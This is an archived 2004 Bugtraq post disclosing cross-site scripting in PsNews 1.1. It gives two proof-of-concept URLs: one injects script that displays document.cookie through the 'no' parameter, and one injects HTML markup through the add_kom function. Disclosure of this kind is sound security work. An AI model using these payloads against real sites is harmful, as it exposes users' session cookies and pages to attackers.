[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Bug XSS in PsNews 1.1
From: Michal Blaszczak <wacky () nicponie ! org>
Date: 2004-09-05 18:55:24
Message-ID: 20040905185524.32251.qmail () www ! securityfocus ! com
[Download RAW message or body]
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky@nicponie.org
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
> BugCross-Site Scripting (XSS) w PsNews 1.1 |
-----------------------------------------------
Exploit:
a)
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic